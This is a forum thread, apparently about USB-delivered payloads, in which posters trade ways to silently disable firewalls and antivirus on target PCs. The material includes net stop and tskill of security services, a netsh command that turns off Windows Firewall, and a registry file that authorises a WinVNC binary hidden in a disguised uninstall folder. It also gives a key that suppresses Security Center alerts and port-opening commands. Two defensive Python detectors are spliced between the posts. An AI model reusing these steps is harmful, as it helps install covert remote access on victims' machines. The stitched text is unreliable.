Firewalled PC


Shiva

erm ... for Net Stop to work u hafta know the other's pc's Username & pwd and u hafta do it from an account that belongs to the Administrator's grp.

Also, if ya kill the FW, especially on boxes with SP2 installed, da Security Centre's msgs's will kick in n start displaying not loaded or some such msg. It may also start Windows own "firewall" if it can b considered a fw at all - lol.

Any other thoughts on this?

thx in adv

Link to comment
Share on other sites

erm ... for Net Stop to work u hafta know the other's pc's Username & pwd and u hafta do it from an account that belongs to the Administrator's grp.

The payload is executed by a local admin account. You don't have to have a username and password, it will use the default profile credentials.

Just add "net stop service" at the top of your payload, and then you can "net start service" at the end to put the firewall back to normal.

The only issue is if the firewall has a task tray icon (and I don't know many that don't). Once you stop the service, the icon changes to show the status of the firewall.

Link to comment
Share on other sites

You can just disable the firewall processes with tskill. If you know the exact service name of the firewall, you can stop it by using net stop [name]. For instance, I can kill my Sygate firewall by using "net stop smcservice"

Do you know the service name for the windows firewall?

Link to comment
Share on other sites

You don't have to disable the windows firewall, just add some registry entries and ur set. When using the WinVNC payload, you only have to add this registry file:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]

"%systemroot%\\$NtUninstallKB21050c07160c070f0b0a0a05031b05$\\WinVNC.exe"="%systemroot%\\$NtUninstallKB21050c07160c070f0b0a0a05031b05$\\WinVNC.exe:*:Enabled:WinVnc"

"%appdata%\\NtUninstallKB21050c07160c070f0b0a0a05031b05\\WinVNC.exe"="%appdata%\\NtUninstallK21050c07160c070f0b0a0a05031b05\\WinVNC.exe:*:Enabled:WinVnc"

Just save it as vnc.reg, and in your go.cmd import it using "reg import vnc.reg" or "regedit /s vnc.reg".

Link to comment
Share on other sites

What I want to do is just to disable the firewall for a short space of time, not using the switchblade or hacksaw.

But I'm doing something else that is blocked by the firewall, and the message is: 'For your protection windows firewall has blocked this operation' or something along those lines.

And I want to know if there is a way to turn it off, do what I want to do, and turn it back on again, by using a batch file etc.

Link to comment
Share on other sites

I'm not using Windows Firewall myself, but I think that this should disable it:

netsh firewall set opmode disable

And to prevent the security center from popping up use this registry file:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

"FirewallDisableNotify"=dword:00000001

Link to comment
Share on other sites
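For the defending side, the two registry changes posted in this thread (an entry under AuthorizedApplications\List and the Security Center FirewallDisableNotify value) can be audited from a .reg export. The following is an added example, not code from any poster; the sample export, its paths, the rule names and the ODD_DIRS list are constructed assumptions.

```python
import re

# Constructed sample: a .reg export of the two keys discussed in this thread.
# The executable paths are made up for the example.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:Enabled:@xpsp2res.dll,-22019"
"%systemroot%\\$NtUninstallKB000000$\\svc.exe"="%systemroot%\\$NtUninstallKB000000$\\svc.exe:*:Enabled:Updater"
"C:\\Program Files\\Example\\app.exe"="C:\\Program Files\\Example\\app.exe:LocalSubNet:Enabled:Example App"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify"=dword:00000001
'''

APP_LIST = r"firewallpolicy\standardprofile\authorizedapplications\list"
SEC_CENTER = r"software\microsoft\security center"
# Assumed list: places a firewall-exempt program is rarely installed to.
ODD_DIRS = ("$ntuninstall", "%appdata%", "%temp%", "\\temp\\")

def audit_reg_export(text):
    """Return a list of (rule, detail) findings from a .reg export."""
    findings, key = [], ""
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].lower()
            continue
        m = re.match(r'"((?:[^"\\]|\\.)*)"=(.*)$', line)
        if not m:
            continue
        name, data = m.group(1).replace("\\\\", "\\"), m.group(2)
        if key.endswith(APP_LIST):
            # Data is path:scope:state:label; split from the right because
            # the path itself may contain a drive-letter colon.
            fields = data.strip('"').replace("\\\\", "\\").rsplit(":", 3)
            if len(fields) != 4 or fields[2].lower() != "enabled":
                continue
            path, scope = fields[0], fields[1]
            if any(d in path.lower() for d in ODD_DIRS):
                findings.append(("exception-odd-path", path))
            elif scope == "*":
                findings.append(("exception-any-source", path))
        elif key.endswith(SEC_CENTER) and name.lower() == "firewalldisablenotify":
            if data.lower() != "dword:00000000":
                findings.append(("firewall-alert-suppressed", data))
    return findings
```

An "exception-any-source" finding is a prompt for review rather than an alert, since stock entries can also use the `*` scope.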

I'm not using Windows Firewall myself, but I think that this should disable it:

netsh firewall set opmode disable

kewl thx :D

And to prevent the security center from popping up use this registry file:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

"FirewallDisableNotify"=dword:00000001

thx again :D

Link to comment
Share on other sites

You can just disable the firewall processes with tskill. If you know the exact service name of the firewall, you can stop it by using net stop [name]. For instance, I can kill my Sygate firewall by using "net stop smcservice"

Do you know the service name for the windows firewall?

Just as a side note, if you know the admin pwd of a remote box which has remote registry enabled ( I think it's enabled by default ) then u can use PSList from http://www.SysInternals.com to get a list of services running on dat box n snipe em one by 1.

Link to comment
Share on other sites

I really think you are better off using the netsh command than using premade registry entries, because of the chances that the comp does not successfully apply the reg key; it could get screwed up and the box is FUBAR.

Also, for the problem with firewalls I have just made a quick batch that pauses or suspends AV, spyware and firewall processes / services, launches the payload and then calls a batch that resumes or starts the processes / services.

Link to comment
Share on other sites

I'm not using Windows Firewall myself, but I think that this should disable it:

netsh firewall set opmode disable

And to prevent the security center from popping up use this registry file:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

"FirewallDisableNotify"=dword:00000001

that worked. Cheers =]

Link to comment
Share on other sites

that worked. Cheers =]

No problem m8 :wink:

I really think you are better off using the netsh command than using premade registry entries, because of the chances that the comp does not successfully apply the reg key; it could get screwed up and the box is FUBAR.

Also, for the problem with firewalls I have just made a quick batch that pauses or suspends AV, spyware and firewall processes / services, launches the payload and then calls a batch that resumes or starts the processes / services.

Can you post it?? I'm making one too, but I don't have a lot of different av/fws to test it with.

Link to comment
Share on other sites

if you follow a similar syntax you should be able to add any port you like

netsh firewall add portopening TCP 5900 SMBv1

netsh firewall add portopening TCP 5800 SMBv2

netsh firewall add portopening UDP 5900 RDPv1

netsh firewall add portopening UDP 5800 RDPv2

It's basically "netsh firewall add portopening" and then the protocol, then the port, then the comment. Btw this is an example of how to apply it to VNC; tvnc does not use UDP but I included it as an example.

Link to comment
Share on other sites
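The commands suggested in this thread (net stop and net start around a payload, tskill, netsh firewall set opmode disable, netsh firewall add portopening, reg import and regedit /s) all leave process command lines behind. The following is an added example, not from any poster, that matches them in process-creation logs and pairs a service stop with its restart on the same host; the events, host names and rule names are constructed.

```python
import re

# Each rule: (name, regex over a process command line). The patterns cover
# only the commands mentioned in this thread.
RULES = [
    ("firewall-disabled", r"\bnetsh(\.exe)?\s+firewall\s+set\s+opmode\s+(mode\s*=\s*)?disable\b"),
    ("firewall-port-opened", r"\bnetsh(\.exe)?\s+firewall\s+add\s+portopening\b"),
    ("service-stopped", r"\bnet1?(\.exe)?\s+stop\s+\S+"),
    ("process-killed", r"\btskill(\.exe)?\s+\S+"),
    ("silent-reg-import", r"\b(reg(\.exe)?\s+import|regedit(\.exe)?\s+/s)\s+\S+"),
]
SVC = re.compile(r"\bnet1?(?:\.exe)?\s+(stop|start)\s+\"?([^\"\s]+)", re.I)

# Constructed process-creation events: (epoch seconds, host, command line).
EVENTS = [
    (1000, "ws01", "net stop smcservice"),
    (1002, "ws01", "cmd /c regedit /s vnc.reg"),
    (1003, "ws01", "netsh firewall add portopening TCP 5900 SMBv1"),
    (1030, "ws01", "net start smcservice"),
    (2000, "ws02", "netsh firewall set opmode disable"),
    (2500, "ws03", "netsh firewall show state"),
    (9000, "ws04", "net stop spooler"),
]

def match_rules(events):
    """Return (ts, host, rule) for every command line a rule matches."""
    return [(ts, host, name) for ts, host, cmd in events
            for name, pat in RULES if re.search(pat, cmd, re.I)]

def stop_start_brackets(events, window=300):
    """Find services stopped and restarted on one host within `window` seconds."""
    stopped, out = {}, []
    for ts, host, cmd in sorted(events):
        m = SVC.search(cmd)
        if not m:
            continue
        verb, svc = m.group(1).lower(), m.group(2).lower()
        if verb == "stop":
            stopped[(host, svc)] = ts
        elif (host, svc) in stopped and ts - stopped[(host, svc)] <= window:
            out.append((host, svc, stopped.pop((host, svc)), ts))
    return out
```

A lone `net stop` is common administrative noise; the short stop/start bracket around other matches on the same host is the stronger signal.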

if you follow a similar syntax you should be able to add any port you like

netsh firewall add portopening TCP 5900 SMBv1

netsh firewall add portopening TCP 5800 SMBv2

netsh firewall add portopening UDP 5900 RDPv1

netsh firewall add portopening UDP 5800 RDPv2

It's basically "netsh firewall add portopening" and then the protocol, then the port, then the comment. Btw this is an example of how to apply it to VNC; tvnc does not use UDP but I included it as an example.

But doesn't that only work with Windows built in firewall?
Link to comment
Share on other sites
